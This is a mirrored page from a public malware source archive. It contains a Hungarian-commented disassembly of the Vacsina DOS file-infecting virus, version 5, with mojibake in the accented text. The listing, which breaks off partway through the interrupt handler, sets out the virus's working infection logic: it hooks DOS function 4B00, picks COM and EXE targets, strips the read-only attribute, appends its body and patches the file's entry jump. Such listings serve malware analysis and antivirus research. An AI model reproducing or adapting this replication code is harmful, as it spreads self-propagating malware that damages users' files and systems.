mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
897 lines
32 KiB
NASM
897 lines
32 KiB
NASM
|
|
|||
|
***************************
|
|||
|
* A Vacsina 5-<EFBFBD>s verzi<EFBFBD>ja *
|
|||
|
***************************
|
|||
|
|
|||
|
A v<EFBFBD>rus a mem<EFBFBD>ri<EFBFBD>ban val<EFBFBD> elhelyezked<EFBFBD>se <EFBFBD>s CS-e szerint van list<EFBFBD>zva.
|
|||
|
|
|||
|
A v<EFBFBD>rus hossza COM fileban 1206D-1221D, EXE fileban 132D, illetve 1338D-1353D by
|
|||
|
te.
|
|||
|
|
|||
|
Nem zen<EFBFBD>l, semmi k<EFBFBD>rt nem tesz. (Csak a fileok idej<EFBFBD>t nem <EFBFBD>ll<EFBFBD>tja vissza. )
|
|||
|
|
|||
|
A fileokat a 4B DOS funkci<EFBFBD> megh<EFBFBD>v<EFBFBD>sakor fert<EFBFBD>zi meg.
|
|||
|
|
|||
|
Egy file fert<EFBFBD>z<EFBFBD>tts<EFBFBD>g<EFBFBD>t az utols<EFBFBD> 8 byteb<EFBFBD>l <EFBFBD>llap<EFBFBD>tja meg. B<EFBFBD>vebb le<EFBFBD>r<EFBFBD>s<EFBFBD>t l<EFBFBD>sd
|
|||
|
ott. Ki<EFBFBD>rt<EFBFBD>sa is
|
|||
|
ez alapj<EFBFBD>n t<EFBFBD>rt<EFBFBD>nhet.
|
|||
|
|
|||
|
1206D-n<EFBFBD>l hosszabb,62867D-n<EFBFBD>l r<EFBFBD>videbb,JMP-pal kezd<EFBFBD>d<EFBFBD> COM fileokat, valamint a
|
|||
|
64947D-n<EFBFBD>l r<EFBFBD>videbb
|
|||
|
EXE fileokat fert<EFBFBD>zi.A COM fileokat paragrafushat<EFBFBD>rra kerek<EFBFBD>ti, majd a lejjebb l
|
|||
|
<EFBFBD>that<EFBFBD> form<EFBFBD>ban
|
|||
|
az eg<EFBFBD>sz v<EFBFBD>rust a mem<EFBFBD>riale<EFBFBD>r<EFBFBD> blokkj<EFBFBD>val egy<EFBFBD>tt a filehoz m<EFBFBD>solja. Fert<EFBFBD>z<EFBFBD>s ut<EFBFBD>
|
|||
|
n egy bip hangot
|
|||
|
hallat. A fert<EFBFBD>z<EFBFBD>s idej<EFBFBD>re egy VACSINA nev<EFBFBD> filet megnyit, de semmit sem csin<EFBFBD>l
|
|||
|
vele. Futtat<EFBFBD>skor
|
|||
|
az eredeti 3 byteot nem <EFBFBD>rja vissza, hanem direkt oda ugrik, ahova a file elei J
|
|||
|
MP mutatott.
|
|||
|
EXE filehoz, ha a headerje stimmel, 0039-t<EFBFBD>l 0084 byteot f<EFBFBD>z (nincs kerek<EFBFBD>t<EFBFBD>s).
|
|||
|
Ez a r<EFBFBD>sz semmit
|
|||
|
sem csin<EFBFBD>l, csak futtatja az eredeti EXE-t. C<EFBFBD>lja, hogy EXE-b<EFBFBD>l COM-ot csin<EFBFBD>ljon
|
|||
|
,<EFBFBD>gy a v<EFBFBD>rus k<EFBFBD>s<EFBFBD>bb
|
|||
|
m<EFBFBD>r megfert<EFBFBD>zheti.<EFBFBD>rdekes,hogy majdnem ugyanezt a k<EFBFBD>dsorozatot tal<EFBFBD>ltam t<EFBFBD>bb ere
|
|||
|
deti MS-DOS 3.10-<EFBFBD>s
|
|||
|
fileon (DEBUG,PRINT,...). Igy a v<EFBFBD>rus<EFBFBD>r<EFBFBD> ezt a r<EFBFBD>szt (az EXE-k relok<EFBFBD>l<EFBFBD>s<EFBFBD>t) inne
|
|||
|
n vette. Felt<EFBFBD>te-
|
|||
|
lezem, hogy van egy olyan EXE2BIN program, ami nem relok<EFBFBD>lhat<EFBFBD> EXE-ket is COM-m<EFBFBD>
|
|||
|
alak<EFBFBD>t. Innen
|
|||
|
sz<EFBFBD>rmazhat ez a k<EFBFBD>dr<EFBFBD>szlet.
|
|||
|
|
|||
|
Azt, hogy m<EFBFBD>r a mem<EFBFBD>ri<EFBFBD>ban van-e a Vacsina a 0000:00C5-<EFBFBD>n ehelyezett 397F azonos
|
|||
|
<EFBFBD>t<EFBFBD>sz<EFBFBD>b<EFBFBD>l <EFBFBD>llapitja
|
|||
|
meg. 0000:00C7-re helyezi a v<EFBFBD>rus verzi<EFBFBD>sz<EFBFBD>m<EFBFBD>t.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FFF0 MLB DB 4D ;A v<>rus egy k<>l<EFBFBD>n mem<65>riablokkban helyezkedik
|
|||
|
el.
|
|||
|
FFF1 MLB_GAZDA DW ? ;Furcsa m<>don ezt is "cipeli" mag<61>val
|
|||
|
FFF3 MLB_HOSSZ DW ? ;Mem<65>riablokk hossza paragrafusokban
|
|||
|
FFF5 DB 0B DUP ?
|
|||
|
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
; V<>ltoz<6F>k
|
|||
|
;---------------------------------------------------------------
|
|||
|
|
|||
|
0000 ERE_INT21 DD ? ;INT 21 eredeti c<>me
|
|||
|
0004 ERE_INT24 DD ? ;INT 24 eredeti c<>me
|
|||
|
0008 F_ATTR DW ? ;File eredeti attributtuma
|
|||
|
000A HANDLE DW ? ;File handle
|
|||
|
000C BUFFER DB 8 DUP (?) ;8 byte beffer
|
|||
|
|
|||
|
|
|||
|
; Egy szabv<62>nyos FCB
|
|||
|
|
|||
|
0014 FCB DB 0 ;Aktu<74>lis drive
|
|||
|
0015 DB 'VACSINA ' ;File n<>v
|
|||
|
0020 DW ? ;Kurrens blokk
|
|||
|
0022 DW ? ;Rekordhossz
|
|||
|
0024 DD ? ;File hossz
|
|||
|
0028 DW ? ;D<>tum
|
|||
|
002A DW ? ;Id<49>
|
|||
|
002C DB 8 DUP (?) ;Lefoglalt
|
|||
|
0034 DB ? ;Rekordsz<73>m a blokkban
|
|||
|
0035 DD ? ;Random rekord
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------
|
|||
|
;EXE filehoz csak az innent<6E>l kezd<7A>d<EFBFBD> 0084 (132D) byteot <20>rja hozz<7A>
|
|||
|
;------------------------------------------------------------------
|
|||
|
|
|||
|
0039 DB ' ' ;20 db SPC
|
|||
|
|
|||
|
ORG 0045 ;<3B>tfed<65>s 0045-004C-ig
|
|||
|
|
|||
|
0045 KEZD_IP DW ? ;ip kezdeti <20>rt<72>ke ez lesz
|
|||
|
0047 KEZD_CS DW ? ;cs kezdeti <20>rt<72>ke ez lesz
|
|||
|
0049 KEZD_SP DW ? ;sp kezdeti <20>rt<72>ke ez lesz
|
|||
|
004B KEZD_SS DW ? ;ss kezdeti <20>rt<72>ke ez lesz
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
; Bel<65>p<EFBFBD>si pont eredetileg EXE filen<65>l
|
|||
|
;---------------------------------------------------------------
|
|||
|
;Ezzel a r<>sszel <20>ri el, hogy egy EXE file COM form<72>tum<75> legyen <20>s lehessen
|
|||
|
fert<EFBFBD>zni
|
|||
|
|
|||
|
004D E80000 CALL 0050
|
|||
|
0050 5B * POP BX ;bx=0050
|
|||
|
0051 50 PUSH AX
|
|||
|
0052 8CC0 MOV AX,ES
|
|||
|
0054 051000 ADD AX,0010 ;ax a program leend<6E> elej<65>re mutat
|
|||
|
0057 8B0E0E01 MOV CX,[010E] ;Stack t<>vols<6C>g
|
|||
|
005B 03C8 ADD CX,AX ;Mi lesz ss kezdeti <20>rt<72>ke
|
|||
|
005D 894FFB MOV [BX-05],CX ;KEZD_SS (004B)
|
|||
|
0060 8B0E1601 MOV CX,[0116] ;K<>dter<65>let t<>vols<6C>ga
|
|||
|
0064 03C8 ADD CX,AX
|
|||
|
0066 894FF7 MOV [BX-09],CX ;KEZD_CS (0047)
|
|||
|
0069 8B0E1001 MOV CX,[0110] ;sp kezdeti <20>rt<72>ke
|
|||
|
006D 894FF9 MOV [BX-07],CX ;KEZD_SP (0049)
|
|||
|
0070 8B0E1401 MOV CX,[0114] ;ip kezdeti <20>rt<72>ke
|
|||
|
0074 894FF5 MOV [BX-0B],CX ;KEZD_IP (0045)
|
|||
|
0077 8B3E1801 MOV DI,[0118] ;Els<6C> reklok<6F>ci<63>s bejegyz<79>s
|
|||
|
007B 8B160801 MOV DX,[0108] ;Header hossza paragrafusban
|
|||
|
007F B104 MOV CL,04
|
|||
|
0081 D3E2 SHL DX,CL ;Header hossza byteokban
|
|||
|
0083 8B0E0601 MOV CX,[0106] ;Relok<6F>ci<63>s bejegyz<79>sek sz<73>ma
|
|||
|
0087 E317 JCXZ 00A0 ;Ugr<67>s, ha nincs mit relok<6F>lni
|
|||
|
|
|||
|
|
|||
|
; Relok<6F>l<EFBFBD>s ciklusa
|
|||
|
|
|||
|
0089 26 * ES:
|
|||
|
008A C5B50001 LDS SI,[DI+0100] ;Hol kell relok<6F>lni
|
|||
|
008E 83C704 ADD DI,+04 ;K<>vetkez<65> relok<6F>ci<63>s bejegyz<79>s
|
|||
|
0091 8CDD MOV BP,DS
|
|||
|
0093 26 ES:
|
|||
|
0094 032E0801 ADD BP,[0108] ;Header hossza paragrafusban
|
|||
|
0098 03E8 ADD BP,AX ;ax=program (file) val<61>di kezdete
|
|||
|
009A 8EDD MOV DS,BP ;Itt kell relok<6F>lni
|
|||
|
009C 0104 ADD [SI],AX ;Relok<6F>ci<63>
|
|||
|
009E E2E9 LOOP 0089
|
|||
|
|
|||
|
|
|||
|
; Az <20>trelok<6F>lt programot a hely<6C>re rakja
|
|||
|
|
|||
|
00A0 0E * PUSH CS
|
|||
|
00A1 1F POP DS ;ds=cs
|
|||
|
00A2 BF0001 MOV DI,0100
|
|||
|
00A5 8BF2 MOV SI,DX ;dx=Header hossza byteokban
|
|||
|
00A7 81C60001 ADD SI,0100
|
|||
|
00AB 8BCB MOV CX,BX ;Mennyi byteot kell mozgatni ? (Ez e
|
|||
|
gy kicsit t<EFBFBD>bb)
|
|||
|
00AD 2BCE SUB CX,SI
|
|||
|
00AF F3 REPZ
|
|||
|
00B0 A4 MOVSB
|
|||
|
|
|||
|
|
|||
|
; Az eredeti EXE program futtat<61>sa
|
|||
|
|
|||
|
00B1 58 POP AX ;ax eredeti <20>rt<72>ke
|
|||
|
00B2 FA CLI
|
|||
|
00B3 8E57FB MOV SS,[BX-05] ;KEZD_SS
|
|||
|
00B6 8B67F9 MOV SP,[BX-07] ;KEZD_SP
|
|||
|
00B9 FB STI
|
|||
|
00BA FF6FF5 JMP FAR [BX-0B] ;KEZD_IP, KEZD_CS
|
|||
|
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
; INT 24 (DOS kritikus hibakezel<65>je)
|
|||
|
;---------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
00BD B003 * MOV AL,03 ;DOS hib<69>t jelezzen
|
|||
|
00BF CF IRET
|
|||
|
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
; INT 21 (DOS bel<65>p<EFBFBD>si pontja)
|
|||
|
;---------------------------------------------------------------
|
|||
|
; Csak a 4B00 (EXECUTE) funkci<63>n<EFBFBD>l avatkozik k<>zbe
|
|||
|
|
|||
|
00C0 9C * PUSHF
|
|||
|
00C1 3D004B CMP AX,4B00
|
|||
|
00C4 7406 JZ 00CC
|
|||
|
00C6 9D POPF
|
|||
|
00C7 2E CS:
|
|||
|
00C8 FF2E0000 JMP FAR [0000]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
; A DOS 4B00 alfunkci<63>ja
|
|||
|
|
|||
|
00CC 06 * PUSH ES ;bp+10
|
|||
|
00CD 1E PUSH DS ;bp+0E
|
|||
|
00CE 55 PUSH BP ;bp+0C
|
|||
|
00CF 57 PUSH DI ;bp+0A
|
|||
|
00D0 56 PUSH SI ;bp+08
|
|||
|
00D1 52 PUSH DX ;bp+06
|
|||
|
00D2 51 PUSH CX ;bp+04
|
|||
|
00D3 53 PUSH BX ;bp+02
|
|||
|
00D4 50 PUSH AX ;bp+00
|
|||
|
00D5 8BEC MOV BP,SP
|
|||
|
|
|||
|
|
|||
|
; INT 24 lek<65>rdez<65>se, <20>t<EFBFBD>r<EFBFBD>sa
|
|||
|
|
|||
|
00D7 B82435 MOV AX,3524 ;GET_INT_VECT (es:bx)
|
|||
|
00DA CD21 INT 21
|
|||
|
00DC 2E CS:
|
|||
|
00DD 8C060600 MOV [0006],ES ;ERE_INT24+2
|
|||
|
00E1 2E CS:
|
|||
|
00E2 891E0400 MOV [0004],BX ;ERE_INT24
|
|||
|
00E6 0E PUSH CS
|
|||
|
00E7 1F POP DS
|
|||
|
00E8 BABD00 MOV DX,00BD
|
|||
|
00EB B82425 MOV AX,2524 ;SET_INT_VECT (ds:dx)
|
|||
|
00EE CD21 INT 21
|
|||
|
|
|||
|
|
|||
|
; A VACSINA nev<65> file megnyit<69>sa (val<61>sz<73>n<EFBFBD>leg a v<>rus nyomonk<6E>vet<65>se miatt
|
|||
|
)
|
|||
|
|
|||
|
00F0 0E PUSH CS ;Megj.:felesleges
|
|||
|
00F1 1F POP DS
|
|||
|
00F2 BA1400 MOV DX,0014
|
|||
|
00F5 B40F MOV AH,0F ;OPEN_FCB (ds:dx)
|
|||
|
00F7 CD21 INT 21
|
|||
|
|
|||
|
|
|||
|
; File eredeti attributtum<75>nak lek<65>rdez<65>se, R/O bit t<>rl<72>se
|
|||
|
|
|||
|
00F9 B80043 MOV AX,4300 ;GET_FILE_ATTR (cx)
|
|||
|
00FC 8E5E0E MOV DS,[BP+0E]
|
|||
|
00FF 8B5606 MOV DX,[BP+06]
|
|||
|
0102 CD21 INT 21
|
|||
|
0104 7303 JNB 0109
|
|||
|
0106 E9DA01 JMP 02E3 ;Hib<69>n<EFBFBD>l
|
|||
|
0109 2E * CS:
|
|||
|
010A 890E0800 MOV [0008],CX ;F_ATTR
|
|||
|
010E B80143 MOV AX,4301 ;SET_FILE_ATTR (cx)
|
|||
|
0111 80E1FE AND CL,FE ;R/O bit t<>rl<72>se
|
|||
|
0114 CD21 INT 21
|
|||
|
0116 7303 JNB 011B
|
|||
|
0118 E9C801 JMP 02E3 ;Hib<69>n<EFBFBD>l
|
|||
|
|
|||
|
|
|||
|
; C<>lbavett file megnyit<69>sa
|
|||
|
; HIBA !!! A file eredeti idej<65>t nem k<>rdezi le <20>s nem <20>ll<6C>tja vissza.
|
|||
|
|
|||
|
011B B8023D * MOV AX,3D02 ;OPEN_HANDLE (dx:dx)
|
|||
|
011E 8E5E0E MOV DS,[BP+0E]
|
|||
|
0121 8B5606 MOV DX,[BP+06]
|
|||
|
0124 CD21 INT 21
|
|||
|
0126 7303 JNB 012B
|
|||
|
0128 E9A801 JMP 02D3 ;Hib<69>n<EFBFBD>l
|
|||
|
012B 2E * CS:
|
|||
|
012C A30A00 MOV [000A],AX ;HANDLE
|
|||
|
012F 8BD8 MOV BX,AX
|
|||
|
|
|||
|
|
|||
|
; File els<6C> 6 bytej<65>nak beolvas<61>sa a BUFFER-be
|
|||
|
|
|||
|
0131 0E PUSH CS
|
|||
|
0132 1F POP DS
|
|||
|
0133 BA0C00 MOV DX,000C ;offset BUFFER
|
|||
|
0136 B90600 MOV CX,0006 ;6 byte olvas<61>sa
|
|||
|
0139 B43F MOV AH,3F ;READ_HANDLE (bx,ds:dx,cx)
|
|||
|
013B CD21 INT 21
|
|||
|
013D 7219 JB 0158 ;Hib<69>n<EFBFBD>l
|
|||
|
013F 3D0600 CMP AX,0006
|
|||
|
0142 7514 JNZ 0158
|
|||
|
|
|||
|
|
|||
|
; EXE-e a kiszemelt file ?
|
|||
|
|
|||
|
0144 2E CS:
|
|||
|
0145 813E0C004D5A CMP WORD PTR [000C],5A4D;EXE file-e
|
|||
|
014B 7503 JNZ 0150
|
|||
|
014D E9B501 JMP 0305
|
|||
|
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
; COM file
|
|||
|
;---------------------------------------------------------------
|
|||
|
|
|||
|
0150 2E * CS:
|
|||
|
0151 803E0C00E9 CMP BYTE PTR [000C],E9 ;Csak akkor fert<72>zz<7A>k, ha JMP-pal kez
|
|||
|
d<EFBFBD>dik
|
|||
|
0156 7403 JZ 015B
|
|||
|
|
|||
|
|
|||
|
; Seg<65>dugr<67>s hib<69>n<EFBFBD>l
|
|||
|
|
|||
|
0158 E96F01 * JMP 02CA
|
|||
|
|
|||
|
|
|||
|
; 1206D < file hossz < 62867D
|
|||
|
|
|||
|
015B B80242 * MOV AX,4202 ;File v<>g<EFBFBD>re <20>ll<6C>s
|
|||
|
015E B90000 MOV CX,0000
|
|||
|
0161 8BD1 MOV DX,CX
|
|||
|
0163 2E CS:
|
|||
|
0164 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
0168 CD21 INT 21 ;dx:ax=file hossz
|
|||
|
016A 72EC JB 0158 ;Hib<69>n<EFBFBD>l
|
|||
|
016C 83FA00 CMP DX,+00
|
|||
|
016F 75E7 JNZ 0158
|
|||
|
0171 3DB604 CMP AX,04B6
|
|||
|
0174 76E2 JBE 0158
|
|||
|
0176 3D93F5 CMP AX,F593
|
|||
|
0179 73DD JNB 0158
|
|||
|
|
|||
|
|
|||
|
; File adatainak elt<6C>rol<6F>sa
|
|||
|
|
|||
|
017B 2E CS:
|
|||
|
017C A39E04 MOV [049E],AX ;ERE_HOSSZ
|
|||
|
017F 2E CS:
|
|||
|
0180 A10D00 MOV AX,[000D] ;File 2.,3. byteja
|
|||
|
0183 050301 ADD AX,0103 ;+ 0103
|
|||
|
0186 2E CS:
|
|||
|
0187 A3A004 MOV [04A0],AX ;ERE_2_3
|
|||
|
|
|||
|
|
|||
|
; File utols<6C> 8 bytej<65>nak beolvas<61>sa
|
|||
|
|
|||
|
018A B80242 MOV AX,4202 ;File v<>ge-8-dik poz<6F>ci<63>ra
|
|||
|
018D B9FFFF MOV CX,FFFF
|
|||
|
0190 BAF8FF MOV DX,FFF8
|
|||
|
0193 2E CS:
|
|||
|
0194 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
0198 CD21 INT 21
|
|||
|
019A 72BC JB 0158 ;Hib<69>n<EFBFBD>l
|
|||
|
019C 2E CS:
|
|||
|
019D 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
01A1 0E PUSH CS
|
|||
|
01A2 1F POP DS
|
|||
|
01A3 BA0C00 MOV DX,000C ;offset BUFFER
|
|||
|
01A6 B90800 MOV CX,0008 ;8 byte olvas<61>sa
|
|||
|
01A9 B43F MOV AH,3F ;READ_HANDLE (bx,ds:dx,cx)
|
|||
|
01AB CD21 INT 21
|
|||
|
01AD 72A9 JB 0158 ;Hib<69>n<EFBFBD>l
|
|||
|
01AF 3D0800 CMP AX,0008
|
|||
|
01B2 75A4 JNZ 0158 ;Hib<69>n<EFBFBD>l
|
|||
|
|
|||
|
|
|||
|
; Fert<72>z<EFBFBD>tt-e m<>r a file
|
|||
|
|
|||
|
01B4 2E CS:
|
|||
|
01B5 813E1000F47A CMP WORD PTR [0010],7AF4;Azonos<6F>t<EFBFBD>sz<73>
|
|||
|
01BB 7577 JNZ 0234 ;M<>g nem fer<65>z<EFBFBD>tt
|
|||
|
01BD 2E CS:
|
|||
|
01BE 833E120005 CMP WORD PTR [0012],+05 ;Verzi<7A>sz<73>m
|
|||
|
01C3 90 NOP
|
|||
|
01C4 7392 JNB 0158 ;Nem fert<72>zz<7A>k
|
|||
|
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
; Egy kor<6F>bbi Vacsina m<>r megfert<72>zte (azt ki<6B>rtja)
|
|||
|
;---------------------------------------------------------------
|
|||
|
; Fert<72>z<EFBFBD>tt file eredeti adatai
|
|||
|
|
|||
|
01C6 2E CS:
|
|||
|
01C7 A10C00 MOV AX,[000C] ;ERE_HOSSZ
|
|||
|
01CA 2E CS:
|
|||
|
01CB A39E04 MOV [049E],AX ;ERE_HOSSZ
|
|||
|
01CE 2E CS:
|
|||
|
01CF A10E00 MOV AX,[000E] ;ERE_2_3
|
|||
|
01D2 2E CS:
|
|||
|
01D3 A3A004 MOV [04A0],AX ;ERE_2_3
|
|||
|
01D6 2D0301 SUB AX,0103
|
|||
|
01D9 2E CS:
|
|||
|
01DA A30C00 MOV [000C],AX ;Eredeti 2.,3. byteja a filenak
|
|||
|
|
|||
|
|
|||
|
; File eredeti 2.,3. bytej<65>nak vissza<7A>r<EFBFBD>sa
|
|||
|
|
|||
|
01DD B80042 MOV AX,4200 ;File 2. bytej<65>ra <20>ll
|
|||
|
01E0 B90000 MOV CX,0000
|
|||
|
01E3 BA0100 MOV DX,0001
|
|||
|
01E6 2E CS:
|
|||
|
01E7 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
01EB CD21 INT 21
|
|||
|
01ED 725F JB 024E ;Hib<69>n<EFBFBD>l
|
|||
|
01EF B440 MOV AH,40 ;WRITE_HANDLE (bx,ds:dx,cx)
|
|||
|
01F1 0E PUSH CS
|
|||
|
01F2 1F POP DS
|
|||
|
01F3 BA0C00 MOV DX,000C ;offset BUFFER
|
|||
|
01F6 B90200 MOV CX,0002 ;2 byte <20>r<EFBFBD>sa
|
|||
|
01F9 CD21 INT 21
|
|||
|
01FB 7251 JB 024E ;Hib<69>n<EFBFBD>l
|
|||
|
01FD 3D0200 CMP AX,0002
|
|||
|
0200 754C JNZ 024E ;Hib<69>n<EFBFBD>l
|
|||
|
|
|||
|
|
|||
|
; Directory bejegyz<79>s aktualiz<69>l<EFBFBD>sa
|
|||
|
|
|||
|
0202 2E CS:
|
|||
|
0203 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
0207 B445 MOV AH,45 ;DUPLICATE_HANDLE (bx)
|
|||
|
0209 CD21 INT 21
|
|||
|
020B 7208 JB 0215 ;Hib<69>n<EFBFBD>l
|
|||
|
020D 8BD8 MOV BX,AX
|
|||
|
020F B43E MOV AH,3E ;CLOSE_HANDLE (bx)
|
|||
|
0211 CD21 INT 21
|
|||
|
0213 7239 JB 024E ;Hib<69>n<EFBFBD>l
|
|||
|
|
|||
|
|
|||
|
; File eredeti m<>retre v<>g<EFBFBD>sa
|
|||
|
|
|||
|
0215 B80042 MOV AX,4200 ;File eredeti v<>g<EFBFBD>re <20>ll
|
|||
|
0218 B90000 MOV CX,0000
|
|||
|
021B 2E CS:
|
|||
|
021C 8B169E04 MOV DX,[049E] ;ERE_HOSSZ
|
|||
|
0220 2E CS:
|
|||
|
0221 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
0225 CD21 INT 21
|
|||
|
0227 7225 JB 024E ;Hib<69>n<EFBFBD>l
|
|||
|
0229 B440 MOV AH,40 ;WRITE_HANDLE (bx,ds:dx,cx)
|
|||
|
022B 0E PUSH CS
|
|||
|
022C 1F POP DS
|
|||
|
022D B90000 MOV CX,0000 ;Csonkol<6F>s
|
|||
|
0230 CD21 INT 21
|
|||
|
0232 721A JB 024E ;Hib<69>n<EFBFBD>l
|
|||
|
|
|||
|
|
|||
|
; COM file megfert<72>z<EFBFBD>se
|
|||
|
; Filehossz kerek<65>t<EFBFBD>se paragrafushat<61>rra
|
|||
|
|
|||
|
0234 B80042 * MOV AX,4200
|
|||
|
0237 B90000 MOV CX,0000
|
|||
|
023A 2E CS:
|
|||
|
023B 8B169E04 MOV DX,[049E] ;ERE_HOSSZ
|
|||
|
023F 83C20F ADD DX,+0F
|
|||
|
0242 83E2F0 AND DX,-10 ;Kerek<65>t<EFBFBD>s
|
|||
|
0245 2E CS:
|
|||
|
0246 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
024A CD21 INT 21
|
|||
|
024C 7303 JNB 0251
|
|||
|
|
|||
|
|
|||
|
; Seg<65>dugr<67>s hib<69>n<EFBFBD>l
|
|||
|
|
|||
|
024E EB7A * JMP 02CA ;Hib<69>n<EFBFBD>l
|
|||
|
0250 90 NOP
|
|||
|
|
|||
|
|
|||
|
; A v<>rus mem<65>riale<6C>r<EFBFBD> blokkj<6B>val egy<67>tt hozz<7A>m<EFBFBD>solja mag<61>t a filehoz
|
|||
|
|
|||
|
0251 2E CS:
|
|||
|
0252 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
0256 8CCA MOV DX,CS
|
|||
|
0258 4A DEC DX
|
|||
|
0259 8EDA MOV DS,DX ;ds=cs-1 (mem.le<6C>r<EFBFBD> blokkra mutat)
|
|||
|
025B BA0000 MOV DX,0000
|
|||
|
025E B9B604 MOV CX,04B6 ;V<>rus hossza (1206)
|
|||
|
0261 B440 MOV AH,40 ;WRITE_HANDLE (bx,ds:dx,cx)
|
|||
|
0263 CD21 INT 21
|
|||
|
0265 72E7 JB 024E ;Hib<69>n<EFBFBD>l
|
|||
|
0267 3DB604 CMP AX,04B6
|
|||
|
026A 75E2 JNZ 024E ;Hib<69>n<EFBFBD>l
|
|||
|
|
|||
|
|
|||
|
; Directory bejegyz<79>s aktualiz<69>l<EFBFBD>sa
|
|||
|
|
|||
|
026C 2E CS:
|
|||
|
026D 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
0271 B445 MOV AH,45 ;DUPLICATE_HANDLE (bx)
|
|||
|
0273 CD21 INT 21
|
|||
|
0275 7208 JB 027F ;Hib<69>n<EFBFBD>l
|
|||
|
0277 8BD8 MOV BX,AX
|
|||
|
0279 B43E MOV AH,3E ;CLOSE_HANDLE (bx)
|
|||
|
027B CD21 INT 21
|
|||
|
027D 72CF JB 024E ;Hib<69>n<EFBFBD>l
|
|||
|
|
|||
|
|
|||
|
; File leend<6E> els<6C> 3 bytej<65>nak kisz<73>m<EFBFBD>t<EFBFBD>sa
|
|||
|
|
|||
|
027F 2E CS:
|
|||
|
0280 C6060C00E9 MOV BYTE PTR [000C],E9 ;JMP k<>dja
|
|||
|
0285 2E CS:
|
|||
|
0286 8B169E04 MOV DX,[049E] ;ERE_HOSSZ
|
|||
|
028A 83C20F ADD DX,+0F
|
|||
|
028D 83E2F0 AND DX,-10 ;Kerek<65>t<EFBFBD>s
|
|||
|
0290 83EA03 SUB DX,+03 ;-3 a JMP miatt
|
|||
|
0293 81C2AC03 ADD DX,03AC ;Bel<65>p<EFBFBD>si pont eltol<6F>sa a file v<>g<EFBFBD>h
|
|||
|
ez k<EFBFBD>pest
|
|||
|
0297 2E CS:
|
|||
|
0298 89160D00 MOV [000D],DX ;JMP operandusa
|
|||
|
|
|||
|
|
|||
|
; File els<6C> 3 bytej<65>nak <20>t<EFBFBD>r<EFBFBD>sa
|
|||
|
|
|||
|
029C B80042 MOV AX,4200 ;File elej<65>re
|
|||
|
029F B90000 MOV CX,0000
|
|||
|
02A2 8BD1 MOV DX,CX
|
|||
|
02A4 2E CS:
|
|||
|
02A5 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
02A9 CD21 INT 21
|
|||
|
02AB 72A1 JB 024E ;Hib<69>n<EFBFBD>l
|
|||
|
02AD 2E CS:
|
|||
|
02AE 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
02B2 0E PUSH CS
|
|||
|
02B3 1F POP DS
|
|||
|
02B4 BA0C00 MOV DX,000C ;offset BEFFER
|
|||
|
02B7 B90300 MOV CX,0003 ;3 byte <20>r<EFBFBD>sa
|
|||
|
02BA B440 MOV AH,40 ;WRITE_HANDLE (bx,ds:dx,cx)
|
|||
|
02BC CD21 INT 21
|
|||
|
02BE 728E JB 024E ;Hib<69>n<EFBFBD>l
|
|||
|
02C0 3D0300 CMP AX,0003
|
|||
|
02C3 7589 JNZ 024E ;Hib<69>n<EFBFBD>l
|
|||
|
|
|||
|
|
|||
|
; Egy BELL kiad<61>sa (Val<61>sz<73>n<EFBFBD>leg ez a verzi<7A> m<>g tesztp<74>ld<6C>ny)
|
|||
|
|
|||
|
02C5 B8070E MOV AX,0E07 ;WRITE_TELETYPE
|
|||
|
02C8 CD10 INT 10
|
|||
|
|
|||
|
|
|||
|
; File lez<65>r<EFBFBD>sa
|
|||
|
|
|||
|
02CA B43E * MOV AH,3E ;CLOSE_HANDLE (bx)
|
|||
|
02CC 2E CS:
|
|||
|
02CD 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
02D1 CD21 INT 21
|
|||
|
|
|||
|
|
|||
|
; File eredeti attributtum<75>nak vissza<7A>ll<6C>t<EFBFBD>sa
|
|||
|
|
|||
|
02D3 B80143 * MOV AX,4301 ;SET_FILE_ATTR (cx)
|
|||
|
02D6 8E5E0E MOV DS,[BP+0E] ;File nev<65>re mutat
|
|||
|
02D9 8B5606 MOV DX,[BP+06]
|
|||
|
02DC 2E CS:
|
|||
|
02DD 8B0E0800 MOV CX,[0008] ;F_ATTR
|
|||
|
02E1 CD21 INT 21
|
|||
|
|
|||
|
|
|||
|
; A VACSINA nev<65> file lez<65>r<EFBFBD>sa (<28>j d<>tumot kap, semmi m<>s)
|
|||
|
|
|||
|
02E3 0E * PUSH CS
|
|||
|
02E4 1F POP DS
|
|||
|
02E5 BA1400 MOV DX,0014 ;FCB
|
|||
|
02E8 B410 MOV AH,10 ;CLOSE_FCB
|
|||
|
02EA CD21 INT 21
|
|||
|
|
|||
|
|
|||
|
; INT 24 vissza<7A>r<EFBFBD>sa, eredeti DOS funkci<63> h<>v<EFBFBD>sa
|
|||
|
|
|||
|
02EC B82425 MOV AX,2524 ;SET_INT_VECT (ds:dx)
|
|||
|
02EF 2E CS:
|
|||
|
02F0 C5160400 LDS DX,[0004] ;ERE_INT24
|
|||
|
02F4 CD21 INT 21
|
|||
|
02F6 58 POP AX
|
|||
|
02F7 5B POP BX
|
|||
|
02F8 59 POP CX
|
|||
|
02F9 5A POP DX
|
|||
|
02FA 5E POP SI
|
|||
|
02FB 5F POP DI
|
|||
|
02FC 5D POP BP
|
|||
|
02FD 1F POP DS
|
|||
|
02FE 07 POP ES
|
